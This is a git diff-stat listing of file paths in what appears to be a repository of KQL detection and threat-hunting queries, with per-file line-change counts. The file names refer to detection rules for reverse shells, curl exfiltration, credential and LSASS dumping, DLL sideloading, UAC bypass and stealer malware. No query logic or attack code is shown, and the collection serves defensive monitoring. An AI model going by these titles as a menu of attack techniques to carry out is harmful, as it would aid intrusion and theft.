...tential_apt_fin7_exploitation_activity.kql | 0 ...d_apt_custom_protocol_handler_creation.kql | 0 ...stom_protocol_handler_dll_registry_set.kql | 0 ...st_blizzard_apt_file_creation_activity.kql | 0 ...t_javascript_constrained_file_creation.kql | 0 ...blizzard_apt_process_creation_activity.kql | 0 ...t_slashandgrab_exploitation_indicators.kql | 0 
...tation_of_goanywhere_mft_vulnerability.kql | 0 ..._file_potential_cve_2025_24054_exploit.kql | 0 ..._spawned_by_centrestack_portal_apppool.kql | 0 .../suspicious_crushftp_child_process.kql | 0 ...ential_sap_netweaver_webshell_creation.kql | 0 ..._sap_netweaver_webshell_creation_linux.kql | 0 ..._potential_cve_2025_32463_exploitation.kql | 0 ...ulnerability_cve_2025_33053_image_load.kql | 0 ...al_notepad_cve_2025_49144_exploitation.kql | 0 ...ve_2025_53770_exploitation_file_create.kql | 0 ...cve_2025_53770_exploitation_indicators.kql | 0 ...hftp_rce_vulnerability_cve_2025_54309_.kql | 0 ...user_and_guid_password_cve_2025_57788_.kql | 0 ...raversal_webshell_drop_cve_2025_57790_.kql | 0 ..._authentication_bypass_cve_2025_57791_.kql | 0 ...25_59287_wsus_suspicious_child_process.kql | 0 ...mic_macos_stealer_filegrabber_activity.kql | 10 +++++++++ ...c_macos_stealer_persistence_indicators.kql | 10 +++++++++ ...grixba_malware_reconnaissance_activity.kql | 13 +++++++++++ .../Katz-Stealer}/katz_stealer_dll_loaded.kql | 0 ...lud_malicious_github_workflow_creation.kql | 0 ...ackage_malicious_exfiltration_via_curl.kql | 0 .../funklocker_ransomware_file_creation.kql | 0 ...ackdoor_curl_tor_socks_proxy_execution.kql | 0 .../macos_filegrabber_infostealer.kql | 10 --------- ...suspicious_long_filename_pattern_linux.kql | 14 ++++++++++++ ...path_configuration_file_creation_linux.kql | 0 .../process_creation}/process_discovery.kql | 0 .../terminate_linux_process_via_kill.kql | 0 ...path_configuration_file_creation_macos.kql | 0 .../clipboard_data_collection_via_pbpaste.kql | 0 ...dential_files_by_uncommon_applications.kql | 0 ...nsitive_files_by_uncommon_applications.kql | 0 ...eg_hive_files_by_uncommon_applications.kql | 0 ...vol_policies_share_by_uncommon_process.kql | 0 ...ok_mail_files_by_uncommon_applications.kql | 0 .../unattend_xml_file_access_attempt.kql | 0 .../ads_zone_identifier_deleted.kql | 0 ...tion_of_an_executable_by_an_executable.kql | 0 
.../file_event}/dmp_hdmp_file_creation.kql | 0 .../file/file_event}/pfx_file_creation.kql | 0 ...th_configuration_file_creation_windows.kql | 0 .../scheduled_task_created_filecreation.kql | 0 ...e_code_tunnel_execution_file_indicator.kql | 0 ..._file_creation_in_codeintegrity_folder.kql | 0 .../webdav_temporary_local_file_creation.kql | 0 .../amsi_dll_load_by_uncommon_process.kql | 0 ...tsproxy_dll_loaded_by_uncommon_process.kql | 0 ..._loaded_by_uncommon_suspicious_process.kql | 0 .../microsoft_excel_add_in_loaded.kql | 0 .../microsoft_word_add_in_loaded.kql | 0 .../image_load}/system_drawing_dll_load.kql | 0 ...ted_in_potentially_suspicious_location.kql | 0 .../wmi_module_loaded_by_uncommon_process.kql | 0 ...xe_network_connection_to_non_local_ips.kql | 0 ...ork_connection_to_non_local_ip_address.kql | 0 ..._exe_initiated_http_network_connection.kql | 0 ...initiated_network_connection_over_http.kql | 0 ...ection_initiated_by_powershell_process.kql | 0 ...ion_initiated_from_users_public_folder.kql | 0 ...suspicious_azure_front_door_connection.kql | 0 .../arbitrary_command_execution_using_wsl.kql | 0 .../cab_file_extraction_via_wusa_exe.kql | 0 ...ment_execution_dfsvc_exe_child_process.kql | 0 .../cmd_shell_output_redirect.kql | 0 .../codepage_modification_via_mode_com.kql | 0 .../process_creation}/curl_exe_execution.kql | 0 ...rl_exe_execution_with_custom_useragent.kql | 0 .../diskshadow_child_process_spawned.kql | 0 .../diskshadow_script_mode_execution.kql | 0 .../dll_call_by_ordinal_via_rundll32_exe.kql | 0 ...ic_net_compilation_via_csc_exe_hunting.kql | 0 .../elevated_system_shell_spawned.kql | 0 ...og_query_requests_by_builtin_utilities.kql | 0 .../execution_from_webserver_root_folder.kql | 0 .../file_download_via_curl_exe.kql | 0 ...le_or_folder_permissions_modifications.kql | 0 ...connection_open_attempt_via_winscp_cli.kql | 0 ...dless_process_launched_via_conhost_exe.kql | 0 ..._new_module_via_powershell_commandline.kql | 0 
..._the_cryptography_powershell_namespace.kql | 0 ..._of_script_inside_of_a_compressed_file.kql | 0 .../microsoft_workflow_compiler_execution.kql | 0 .../process_creation}/net_exe_execution.kql | 0 ...cting_package_created_via_iexpress_exe.kql | 0 ...e_added_via_new_netfirewallrule_cmdlet.kql | 0 ...ed_compressed_file_extraction_via_7zip.kql | 0 ...tware_execution_uc_berkeley_signature_.kql | 0 ...e_obfuscation_using_unicode_characters.kql | 0 ...tential_data_exfiltration_via_curl_exe.kql | 0 ...sideloading_activity_via_extexport_exe.kql | 0 ...l_file_override_append_via_set_command.kql | 0 ...assword_reconnaissance_via_findstr_exe.kql | 0 ...on_via_explorer_exe_from_shell_process.kql | 0 ..._execution_from_guid_like_folder_names.kql | 0 ...suspicious_compression_tool_parameters.kql | 0 ..._suspicious_powershell_child_processes.kql | 0 .../process_execution_from_webdav_share.kql | 0 .../process_terminated_via_taskkill.kql | 0 ...ary_code_execution_and_remote_sessions.kql | 0 ...access_tool_ammy_admin_agent_execution.kql | 0 ...s_tool_cmd_exe_execution_via_anyviewer.kql | 0 ...nnect_remote_command_execution_hunting.kql | 0 ...isterserver_export_function_explicitly.kql | 0 .../sc_exe_query_execution.kql | 0 ...m_potential_suspicious_parent_location.kql | 0 ...files_as_system_files_using_attrib_exe.kql | 0 .../smb_over_quic_via_net_exe.kql | 0 ...s_new_instance_of_an_office_com_object.kql | 0 .../suspicious_tasklist_discovery_command.kql | 0 ...tem_information_discovery_via_wmic_exe.kql | 0 .../tunneling_tool_execution.kql | 0 .../unusually_long_powershell_commandline.kql | 0 .../use_short_name_path_in_command_line.kql | 0 ...scp_execution_from_non_standard_folder.kql | 0 ...vbe_file_execution_via_cscript_wscript.kql | 0 .../scheduled_task_created_registry.kql | 0 ...d_executed_via_run_dialog_box_registry.kql | 0 ...rosoft_office_trusted_location_updated.kql | 0 ..._the_cryptography_powershell_namespace.kql | 0 ...rvice_binary_in_user_controlled_folder.kql | 0 
.../shell_context_menu_command_tampering.kql | 0 ...ad_from_browser_process_via_inline_url.kql | 10 --------- .../rdp_sensitive_settings_changed.kql | 13 ----------- ..._via_werfaultsecure_through_edr_freeze.kql | 12 ---------- .../pua_adfind_suspicious_execution.kql | 12 ---------- ...edpaths_from_browser_file_upload_abuse.kql | 10 --------- ...process_from_browser_file_upload_abuse.kql | 14 ------------ .../fsutil_behavior_set_symlinkevaluation.kql | 13 ----------- ...stence_via_new_amsi_providers_registry.kql | 12 ---------- ...of_renamed_sysinternals_tools_registry.kql | 12 ---------- .../linux_doas_conf_file_creation.kql | 0 .../persistence_via_cron_files.kql | 0 .../persistence_via_sudoers_files.kql | 0 ...hell_script_creation_in_profile_folder.kql | 0 ...filename_with_embedded_base64_commands.kql | 13 +++++++++++ ...le_cross_ebpf_rootkit_default_lockfile.kql | 0 ...cross_ebpf_rootkit_default_persistence.kql | 0 .../wget_creating_files_in_tmp_directory.kql | 0 ...onet_tunneling_service_initiated_linux.kql | 0 ...ation_to_ngrok_tunneling_service_linux.kql | 0 .../linux_crypto_mining_pool_connections.kql | 0 .../linux_reverse_shell_indicator.kql | 0 ...s_malware_callback_communication_linux.kql | 0 .../access_of_sudoers_file_content.kql | 0 .../audit_rules_deleted_via_auditctl.kql | 0 .../bash_interactive_shell.kql | 0 .../bpftrace_unsafe_option_usage.kql | 0 .../capabilities_discovery_linux.kql | 0 .../capsh_shell_invocation_linux.kql | 0 .../chmod_suspicious_directory.kql | 0 .../process_creation}/clear_linux_logs.kql | 0 .../clipboard_collection_with_xclip_tool.kql | 0 .../process_creation}/connection_proxy.kql | 0 ...esidence_discovery_via_proc_virtual_fs.kql | 0 .../copy_passwd_or_shadow_from_tmp_path.kql | 0 .../process_creation}/crontab_enumeration.kql | 0 .../process_creation}/curl_usage_on_linux.kql | 0 .../process_creation}/dd_file_overwrite.kql | 0 .../decode_base64_encoded_text.kql | 0 .../disable_or_stop_services.kql | 0 
.../disabling_security_tools.kql | 0 ...tainer_discovery_via_dockerenv_listing.kql | 0 ...entially_suspicious_directory_via_wget.kql | 0 .../enable_bpf_kprobes_tracing.kql | 0 .../esxi_account_creation_via_esxcli.kql | 0 ...mission_assigned_to_account_via_esxcli.kql | 0 ...ork_configuration_discovery_via_esxcli.kql | 0 ...orage_information_discovery_via_esxcli.kql | 0 ...syslog_configuration_change_via_esxcli.kql | 0 ...ystem_information_discovery_via_esxcli.kql | 0 .../esxi_vm_kill_via_esxcli.kql | 0 .../esxi_vm_list_discovery_via_esxcli.kql | 0 ..._vsan_information_discovery_via_esxcli.kql | 0 ...ed_in_potentially_suspicious_directory.kql | 0 .../file_and_directory_discovery_linux.kql | 0 .../process_creation}/file_deletion.kql | 0 .../flush_iptables_ufw_chain.kql | 0 .../group_has_been_deleted_via_groupdel.kql | 0 .../history_file_deletion.kql | 0 ...tion_spawn_shell_via_os_system_library.kql | 0 .../install_root_certificate.kql | 0 .../interactive_bash_suspicious_children.kql | 0 ...security_stopped_via_commandline_linux.kql | 0 .../linux_base64_encoded_pipe_to_shell.kql | 0 .../linux_base64_encoded_shebang_in_cli.kql | 0 .../linux_crypto_mining_indicators.kql | 0 .../linux_doas_tool_execution.kql | 0 .../linux_hacktool_execution.kql | 0 ...twork_service_scanning_tools_execution.kql | 0 .../linux_package_uninstall.kql | 0 .../linux_recon_indicators.kql | 0 .../linux_remote_system_discovery.kql | 0 .../linux_shell_pipe_to_shell.kql | 0 .../linux_sudo_chroot_execution.kql | 0 .../linux_webshell_indicators.kql | 0 .../local_groups_discovery_linux.kql | 0 .../local_system_accounts_discovery_linux.kql | 0 ...sk_system_power_settings_via_systemctl.kql | 0 ...mount_execution_with_hidepid_parameter.kql | 0 .../named_pipe_created_via_mkfifo.kql | 0 .../process_creation}/nohup_execution.kql | 0 .../os_architecture_discovery_via_grep.kql | 0 ...scan_binary_data_transmission_activity.kql | 0 ...container_discovery_via_inodes_listing.kql | 2 +- 
...al_discovery_activity_using_find_linux.kql | 0 ...tential_gobrat_file_discovery_via_grep.kql | 0 ...ntial_linux_amazon_ssm_agent_hijacking.kql | 0 ..._process_code_injection_via_dd_utility.kql | 0 ...tential_netcat_reverse_shell_execution.kql | 0 ...potential_perl_reverse_shell_execution.kql | 0 .../potential_php_reverse_shell.kql | 0 .../potential_ruby_reverse_shell.kql | 0 ...ous_change_to_sensitive_critical_files.kql | 0 .../potential_xterm_reverse_shell.kql | 0 ...y_suspicious_execution_from_tmp_folder.kql | 0 ...spicious_named_pipe_created_via_mkfifo.kql | 0 .../print_history_file_contents.kql | 0 .../pua_trufflehog_execution_linux.kql | 0 ...l_execution_via_pty_and_socket_modules.kql | 0 ...hon_spawning_pretty_tty_via_pty_module.kql | 0 .../python_webserver_execution_linux.kql | 0 ...m_viewer_session_started_on_linux_host.kql | 0 .../remove_immutable_file_attribute.kql | 0 .../remove_scheduled_cron_task_job.kql | 0 .../scheduled_cron_task_job_linux.kql | 0 .../scheduled_task_job_at.kql | 0 .../security_software_discovery_linux.kql | 0 .../process_creation}/setuid_and_setgid.kql | 0 .../shell_execution_gcc_linux.kql | 0 ...on_of_process_located_in_tmp_directory.kql | 0 .../shell_execution_via_find_linux.kql | 0 .../shell_execution_via_flock_linux.kql | 0 .../shell_execution_via_git_linux.kql | 0 .../shell_execution_via_nice_linux.kql | 0 .../shell_execution_via_rsync_linux.kql | 0 .../shell_invocation_via_apt_linux.kql | 0 ...shell_invocation_via_env_command_linux.kql | 0 .../shell_invocation_via_ssh_linux.kql | 0 ...spicious_curl_change_user_agents_linux.kql | 0 .../suspicious_curl_file_upload_linux.kql | 0 ...load_and_execute_pattern_via_curl_wget.kql | 0 .../suspicious_git_clone_linux.kql | 0 ...ious_invocation_of_shell_via_awk_linux.kql | 0 ...spicious_invocation_of_shell_via_rsync.kql | 0 .../suspicious_java_children_processes.kql | 0 .../suspicious_nohup_execution.kql | 0 .../suspicious_package_installed_linux.kql | 0 
...earing_or_removal_via_system_utilities.kql | 0 .../system_information_discovery.kql | 0 ...em_network_connections_discovery_linux.kql | 0 .../system_network_discovery_linux.kql | 0 .../touch_suspicious_service_file.kql | 0 ...riple_cross_ebpf_rootkit_execve_hijack.kql | 0 ...le_cross_ebpf_rootkit_install_commands.kql | 0 .../ufw_force_stop_using_ufw_init.kql | 0 ...ed_to_root_sudoers_group_using_usermod.kql | 0 .../user_has_been_deleted_via_userdel.kql | 0 .../vim_gtfobin_abuse_linux.kql | 0 .../file_event}/macos_emond_launch_daemon.kql | 0 .../startup_item_file_created_macos.kql | 0 .../binary_padding_macos.kql | 0 ...lipboard_data_collection_via_osascript.kql | 0 .../creation_of_a_local_user_account.kql | 0 ...dentials_from_password_stores_keychain.kql | 0 .../credentials_in_files.kql | 0 .../decode_base64_encoded_text_macos.kql | 0 .../disable_security_tools.kql | 0 .../disk_image_creation_via_hdiutil_macos.kql | 0 .../disk_image_mounting_via_hdiutil_macos.kql | 0 .../file_and_directory_discovery_macos.kql | 0 .../file_download_via_nscurl_macos.kql | 0 .../file_time_attribute_change.kql | 0 .../gatekeeper_bypass_via_xattr.kql | 0 .../guest_account_enabled_via_sysadminctl.kql | 0 .../gui_input_capture_macos.kql | 0 ...et_on_file_directory_via_chflags_macos.kql | 0 .../hidden_user_creation.kql | 0 ..._removal_on_host_clear_mac_system_logs.kql | 0 .../process_creation}/jamf_mdm_execution.kql | 0 ...mdm_potential_suspicious_child_process.kql | 0 .../jxa_in_memory_execution_via_osascript.kql | 0 ...h_agent_daemon_execution_via_launchctl.kql | 0 .../local_groups_discovery_macos.kql | 0 .../local_system_accounts_discovery_macos.kql | 0 .../macos_network_service_scanning.kql | 0 .../macos_remote_system_discovery.kql | 0 ...acos_scripting_interpreter_applescript.kql | 0 .../network_sniffing_macos.kql | 0 ...added_to_time_machine_via_tmutil_macos.kql | 0 ...otentially_suspicious_applet_osascript.kql | 0 .../osacompile_run_only_execution.kql | 0 
...d_and_decrypted_via_built_in_utilities.kql | 0 .../potential_base64_decoded_from_images.kql | 0 ...al_discovery_activity_using_find_macos.kql | 0 ...emory_download_and_compile_of_payloads.kql | 0 .../potential_persistence_via_plistbuddy.kql | 0 ...tential_wizardupdate_malware_infection.kql | 0 .../potential_xcsset_malware_infection.kql | 0 ...ol_potential_meshagent_execution_macos.kql | 0 ...tool_renamed_meshagent_execution_macos.kql | 0 ...m_viewer_session_started_on_macos_host.kql | 0 .../root_account_enable_via_dsenableroot.kql | 0 .../scheduled_cron_task_job_macos.kql | 0 .../screen_capture_macos.kql | 0 .../security_software_discovery_macos.kql | 0 .../space_after_filename_macos.kql | 0 .../split_a_file_into_pieces.kql | 0 ...suspicious_browser_child_process_macos.kql | 0 ...ious_execution_via_macos_script_editor.kql | 0 .../suspicious_history_file_operations.kql | 0 ...icious_installer_package_child_process.kql | 0 .../suspicious_macos_firmware_activity.kql | 0 ...s_microsoft_office_child_process_macos.kql | 0 ...stem_information_discovery_using_ioreg.kql | 0 ...em_information_discovery_using_sw_vers.kql | 0 ...mation_discovery_using_system_profiler.kql | 0 ...information_discovery_via_sysctl_macos.kql | 0 ...stem_integrity_protection_sip_disabled.kql | 0 ...m_integrity_protection_sip_enumeration.kql | 0 ...em_network_connections_discovery_macos.kql | 0 .../system_network_discovery_macos.kql | 0 .../system_shutdown_reboot_macos.kql | 0 ...ckup_deletion_attempt_via_tmutil_macos.kql | 0 ...chine_backup_disabled_via_tmutil_macos.kql | 0 .../user_added_to_admin_group_via_dscl.kql | 0 ...r_added_to_admin_group_via_dseditgroup.kql | 0 ...r_added_to_admin_group_via_sysadminctl.kql | 0 .../outgoing_logon_with_new_credentials.kql | 0 .../successful_account_login_via_wmi.kql | 0 ..._monitoring_agent_registry_keys_access.kql | 0 ...th_service_agents_registry_keys_access.kql | 0 ...ccess_of_signal_desktop_sensitive_data.kql | 0 
...potential_secure_deletion_with_sdelete.kql | 0 ...es_accessing_the_microphone_and_webcam.kql | 0 .../sam_registry_hive_handle_request.kql | 0 ..._application_related_objectacess_event.kql | 0 .../security}/syskey_registry_keys_access.kql | 0 .../security}/wce_wceaux_dll_access.kql | 0 ...ndows_defender_exclusion_list_modified.kql | 0 .../security}/wmi_persistence_security.kql | 0 ...rency_wallets_by_uncommon_applications.kql | 0 ..._sysvol_files_by_uncommon_applications.kql | 0 ..._history_file_by_uncommon_applications.kql | 0 ...i_master_keys_by_uncommon_applications.kql | 0 ...anager_access_by_uncommon_applications.kql | 0 ...e_file_access_by_uncommon_applications.kql | 0 ...e_access_to_browser_credential_storage.kql | 0 .../unusual_file_modification_by_dns_exe.kql | 0 ...tifier_deleted_by_uncommon_application.kql | 0 .../file_delete}/backup_files_deleted.kql | 0 .../eventlog_evtx_file_deleted.kql | 0 ...ange_powershell_cmdlet_history_deleted.kql | 0 .../file_deleted_via_sysinternals_sdelete.kql | 0 .../iis_webserver_access_logs_deleted.kql | 0 ...owershell_console_history_logs_deleted.kql | 0 .../file_delete}/prefetch_file_deleted.kql | 0 .../teamviewer_log_file_deleted.kql | 0 .../tomcat_webserver_logs_deleted.kql | 0 .../unusual_file_deletion_by_dns_exe.kql | 0 ...p_file_created_by_uncommon_application.kql | 0 ...ing_complete_ad_snapshot_into_dat_file.kql | 0 ...i_cache_file_creation_by_uncommon_tool.kql | 0 .../advanced_ip_scanner_file_event.kql | 0 .../adwind_rat_jrat_file_artifact.kql | 0 .../anydesk_temporary_artefact.kql | 0 ...sembly_dll_creation_via_aspnetcompiler.kql | 0 ...d_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql | 0 .../bloodhound_collection_files.kql | 0 ...created_files_by_microsoft_sync_center.kql | 0 ...ion_exe_for_service_with_unquoted_path.kql | 0 .../file_event}/creation_of_a_diagcab.kql | 0 .../creation_of_non_existent_system_dll.kql | 0 ...werfault_exe_wer_dll_in_unusual_folder.kql | 0 .../cred_dump_tools_dropped_files.kql | 2 +- 
.../csexec_service_file_creation.kql | 0 ..._hijackig_via_additional_space_in_path.kql | 0 ...ys_and_certificate_export_activity_ioc.kql | 0 ...naries_into_spool_drivers_color_folder.kql | 0 .../dynamic_csharp_compile_artefact.kql | 0 .../evtx_created_in_uncommon_location.kql | 0 ...on_in_suspicious_directory_by_msdt_exe.kql | 0 ...nsion_created_by_an_office_application.kql | 0 ...stem_dll_name_in_unsuspected_locations.kql | 0 ..._process_name_in_unsuspected_locations.kql | 0 ...kinfo_vbs_reconnaissance_script_output.kql | 0 ...assist_temporary_installation_artefact.kql | 0 .../hacktool_crackmapexec_file_indicators.kql | 0 ...ol_dumpert_process_dumper_default_file.kql | 0 .../hacktool_impacket_file_indicators.kql | 0 .../hacktool_inveigh_execution_artefacts.kql | 0 .../hacktool_mimikatz_kirbi_file_creation.kql | 0 .../hacktool_nppspy_hacktool_usage.kql | 0 ...a_crackmapexec_or_impacket_secretsdump.kql | 0 .../hacktool_powerup_write_hijack_dll.kql | 0 .../hacktool_quarkspwdump_dump_file.kql | 0 ...b_relay_secrets_dump_module_indicators.kql | 0 .../hacktool_safetykatz_dump_indicator.kql | 0 ..._typical_hivenightmare_sam_file_export.kql | 0 ...ck_legit_rdp_session_to_move_laterally.kql | 0 .../installation_of_teamviewer_desktop.kql | 0 .../iso_file_created_within_temp_folders.kql | 0 ..._image_mount_indicator_in_recent_files.kql | 0 ...legitimate_application_dropped_archive.kql | 0 ...itimate_application_dropped_executable.kql | 0 .../legitimate_application_dropped_script.kql | 0 .../file_event}/livekd_driver_creation.kql | 0 ...kd_driver_creation_by_uncommon_process.kql | 0 ...livekd_kernel_memory_dump_file_created.kql | 0 ...ess_dump_artefact_in_crashdumps_folder.kql | 0 ...s_memory_dump_creation_via_taskmgr_exe.kql | 0 .../lsass_process_memory_dump_files.kql | 0 ...ropped_in_the_teams_or_onedrive_folder.kql | 0 ...icious_powershell_scripts_filecreation.kql | 0 .../new_custom_shim_database_created.kql | 0 .../file_event}/new_outlook_macro_created.kql | 0 
.../file/file_event}/ntds_dit_created.kql | 0 ...it_creation_by_uncommon_parent_process.kql | 0 .../ntds_dit_creation_by_uncommon_process.kql | 0 .../ntds_exfiltration_filename_patterns.kql | 0 .../file_event}/octopus_scanner_malware.kql | 0 .../office_macro_file_creation.kql | 0 ..._file_creation_from_suspicious_process.kql | 0 .../office_macro_file_download.kql | 0 ...nt_file_dropped_in_suspicious_location.kql | 0 .../pcre_net_package_temp_files.kql | 0 .../pdf_file_created_by_regedit_exe.kql | 0 ...inary_or_script_dropper_via_powershell.kql | 0 ...nternetexplorer_application_dll_hijack.kql | 0 ..._spoofing_using_right_to_left_override.kql | 0 ...ation_via_ntfs_index_allocation_stream.kql | 0 ...using_lookalike_characters_in_filename.kql | 0 ..._access_via_dll_search_order_hijacking.kql | 0 ...rsistence_attempt_via_errorhandler_cmd.kql | 0 ...ersistence_via_microsoft_office_add_in.kql | 0 ...ce_via_microsoft_office_startup_folder.kql | 0 ...ential_persistence_via_notepad_plugins.kql | 0 ...potential_persistence_via_outlook_form.kql | 0 ...lation_attempt_via_exe_local_technique.kql | 0 ...ential_ripzip_attack_on_startup_folder.kql | 0 .../potential_sam_database_dump.kql | 0 ...hortcut_persistence_via_powershell_exe.kql | 0 ...picious_powershell_module_file_created.kql | 0 ...al_webshell_creation_on_static_website.kql | 0 .../potential_winnti_dropper_activity.kql | 0 ...ally_suspicious_dmp_hdmp_file_creation.kql | 0 ...y_suspicious_wdac_policy_file_creation.kql | 0 .../powershell_module_file_created.kql | 0 ...file_created_by_non_powershell_process.kql | 0 .../powershell_profile_modification.kql | 0 ...hell_script_dropped_via_powershell_exe.kql | 0 ...er_creation_by_non_sysinternals_binary.kql | 0 ...er_creation_by_non_sysinternals_binary.kql | 0 .../psexec_remote_execution_file_artefact.kql | 0 .../psexec_service_file_creation.kql | 0 ...olicytest_creation_by_uncommon_process.kql | 0 ...nt_file_dropped_in_suspicious_location.kql | 0 
.../rclone_config_file_creation.kql | 0 .../remcom_service_file_creation.kql | 0 ...cess_tool_screenconnect_temporary_file.kql | 0 ...e_code_tunnel_execution_file_indicator.kql | 0 .../file/file_event}/scr_file_write_event.kql | 0 ...onnect_temporary_installation_artefact.kql | 0 ...ted_in_potentially_suspicious_location.kql | 0 .../file_event}/startup_folder_file_write.kql | 0 .../suspicious_aspx_file_drop_by_exchange.kql | 0 ..._binaries_and_scripts_in_public_folder.kql | 0 .../suspicious_binary_writes_via_anydesk.kql | 0 ...ious_creation_txt_file_in_user_desktop.kql | 0 .../suspicious_creation_with_colorcpl.kql | 0 ...s_deno_file_written_from_remote_source.kql | 0 .../suspicious_desktop_ini_action.kql | 0 ...spicious_desktopimgdownldr_target_file.kql | 0 .../suspicious_double_extension_files.kql | 0 .../suspicious_executable_file_creation.kql | 0 ...created_in_outlook_temporary_directory.kql | 0 .../suspicious_file_created_in_perflogs.kql | 0 ...s_file_created_via_onenote_application.kql | 0 ..._activity_from_fake_recycle_bin_folder.kql | 0 ...le_creation_in_uncommon_appdata_folder.kql | 0 .../suspicious_file_drop_by_exchange.kql | 0 ..._write_to_sharepoint_layouts_directory.kql | 0 ...s_file_write_to_webapps_root_directory.kql | 0 ...suspicious_files_in_default_gpo_folder.kql | 0 .../suspicious_get_variable_exe_creation.kql | 0 ...cious_interactive_powershell_as_system.kql | 0 ...ious_lnk_double_extension_file_created.kql | 0 ...sexchangemailboxreplication_aspx_write.kql | 0 .../suspicious_outlook_macro_created.kql | 0 ...ous_procexp152_sys_file_created_in_tmp.kql | 0 ...scheduled_task_write_to_system32_tasks.kql | 0 ...cious_screensaver_binary_file_creation.kql | 0 .../suspicious_startup_folder_persistence.kql | 0 .../file_event}/teamviewer_remote_session.kql | 0 ...ypass_abusing_winsat_path_parsing_file.kql | 0 ...bypass_using_consent_and_comctl32_file.kql | 0 .../file_event}/uac_bypass_using_eventvwr.kql | 0 ..._bypass_using_idiagnostic_profile_file.kql | 0 
.../uac_bypass_using_ieinstal_file.kql | 0 ...using_msconfig_token_modification_file.kql | 0 ..._bypass_using_net_code_profiler_on_mmc.kql | 0 ...c_bypass_using_ntfs_reparse_point_file.kql | 0 ...bypass_using_windows_media_player_file.kql | 0 ...fi_persistence_via_wpbbin_filecreation.kql | 0 ..._file_created_in_office_startup_folder.kql | 0 ..._file_creation_by_mysql_daemon_process.kql | 0 .../vhd_image_download_via_browser.kql | 0 ...tudio_code_tunnel_remote_file_creation.kql | 0 ...vscode_powershell_profile_modification.kql | 0 .../werfault_lsass_process_memory_dump.kql | 0 ...s_binaries_write_suspicious_extensions.kql | 0 ...cation_file_write_to_suspicious_folder.kql | 0 ...tings_modification_by_uncommon_process.kql | 0 ...ar_creating_files_in_startup_locations.kql | 0 ...le_file_creation_by_non_system_process.kql | 0 ...tence_script_event_consumer_file_write.kql | 0 .../wmiexec_default_output_file.kql | 0 .../wmiprvse_wbemcomn_dll_hijack_file.kql | 0 .../file_event}/writing_local_admin_share.kql | 0 .../wscript_or_cscript_dropper_file.kql | 0 ...l_sideloading_from_suspicious_location.kql | 0 .../amsi_dll_loaded_via_lolbin_process.kql | 0 ...work_service_potential_dll_sideloading.kql | 0 .../baaupdate_exe_suspicious_dll_load.kql | 0 ...ted_in_a_potential_suspicious_location.kql | 0 ...clr_dll_loaded_via_office_applications.kql | 0 .../credui_dll_loaded_by_uncommon_process.kql | 0 ...ibrary_sdiageng_dll_loaded_by_msdt_exe.kql | 0 ...stem_process_from_suspicious_locations.kql | 0 ...from_suspicious_location_via_cmspt_exe.kql | 0 .../dll_sideloading_of_shellchromeapi_dll.kql | 0 ...mbly_dll_loaded_via_office_application.kql | 0 ...r_dll_loaded_by_scripting_applications.kql | 0 .../fax_service_dll_search_order_hijack.kql | 0 ...gac_dll_loaded_via_office_applications.kql | 0 ...hacktool_silenttrinity_stager_dll_load.kql | 0 ...f_rstrtmgr_dll_by_a_suspicious_process.kql | 0 ...of_rstrtmgr_dll_by_an_uncommon_process.kql | 0 ...l_add_in_loaded_from_uncommon_location.kql 
| 0 .../microsoft_office_dll_sideload.kql | 0 ...a_for_outlook_addin_loaded_via_outlook.kql | 0 .../mmc_loading_script_engines_dlls.kql | 0 .../pcre_net_package_image_load.kql | 0 .../potential_7za_dll_sideloading.kql | 0 ...ial_antivirus_software_dll_sideloading.kql | 0 .../potential_appverifui_dll_sideloading.kql | 0 .../potential_avkkid_dll_sideloading.kql | 0 .../potential_azure_browser_sso_abuse.kql | 0 .../potential_ccleanerdu_dll_sideloading.kql | 0 ...al_ccleanerreactivator_dll_sideloading.kql | 0 ...al_chrome_frame_helper_dll_sideloading.kql | 0 ...orer_application_dll_hijack_image_load.kql | 0 ...tential_dll_sideloading_of_dbgcore_dll.kql | 0 ...tential_dll_sideloading_of_dbghelp_dll.kql | 0 ...ential_dll_sideloading_of_dbgmodel_dll.kql | 0 ...sideloading_of_libcurl_dll_via_gup_exe.kql | 0 ...potential_dll_sideloading_of_mpsvc_dll.kql | 0 ...ential_dll_sideloading_of_mscorsvc_dll.kql | 0 ...tial_dll_sideloading_using_coregen_exe.kql | 0 ..._sideloading_via_classicexplorer32_dll.kql | 0 ...ntial_dll_sideloading_via_comctl32_dll.kql | 0 ...potential_dll_sideloading_via_jsschhlp.kql | 0 ...ential_dll_sideloading_via_vmware_xfer.kql | 0 .../potential_eacore_dll_sideloading.kql | 0 .../potential_edputil_dll_sideloading.kql | 0 .../potential_goopdate_dll_sideloading.kql | 0 .../potential_iviewers_dll_sideloading.kql | 0 .../potential_libvlc_dll_sideloading.kql | 0 .../potential_mfdetours_dll_sideloading.kql | 0 .../potential_mpclient_dll_sideloading.kql | 0 .../potential_rcdll_dll_sideloading.kql | 0 ..._dll_sideloading_from_default_location.kql | 0 ..._sideloading_from_non_default_location.kql | 0 .../potential_roboform_dll_sideloading.kql | 0 ...otential_shelldispatch_dll_sideloading.kql | 0 .../potential_smadhook_dll_sideloading.kql | 0 ...ential_solidpdfcreator_dll_sideloading.kql | 0 ..._sideloading_from_non_system_locations.kql | 0 .../potential_vivaldi_elf_dll_sideloading.kql | 0 .../potential_waveedit_dll_sideloading.kql | 0 
...azuh_security_platform_dll_sideloading.kql | 0 .../potential_wwlib_dll_sideloading.kql | 0 ...s_volume_shadow_copy_vsstrace_dll_load.kql | 0 ...e_dll_loaded_by_non_powershell_process.kql | 0 ...core_dll_loaded_via_office_application.kql | 0 ...ython_image_load_by_non_python_process.kql | 0 .../remote_dll_load_via_rundll32_exe.kql | 0 ...ous_volume_shadow_copy_vss_ps_dll_load.kql | 0 ...ous_volume_shadow_copy_vssapi_dll_load.kql | 0 .../suspicious_wsman_provider_image_loads.kql | 0 ...nel_item_loaded_from_uncommon_location.kql | 0 .../third_party_software_dll_sideloading.kql | 0 ...e_travel_debugging_utility_usage_image.kql | 0 ..._bypass_via_windows_directory_spoofing.kql | 0 .../uac_bypass_using_iscsicpl_imageload.kql | 0 .../image_load}/uac_bypass_with_fake_dll.kql | 0 .../vba_dll_loaded_via_office_application.kql | 0 ...mers_activity_via_scrcons_exe_dll_load.kql | 0 ...ersistence_command_line_event_consumer.kql | 0 .../wmic_loading_scripting_libraries.kql | 0 .../wmiprvse_wbemcomn_dll_hijack.kql | 0 ...localtonet_tunneling_service_initiated.kql | 0 ...n_to_ngrok_tunneling_service_initiated.kql | 0 ...nication_to_uncommon_destination_ports.kql | 0 ...ection_initiated_by_script_interpreter.kql | 0 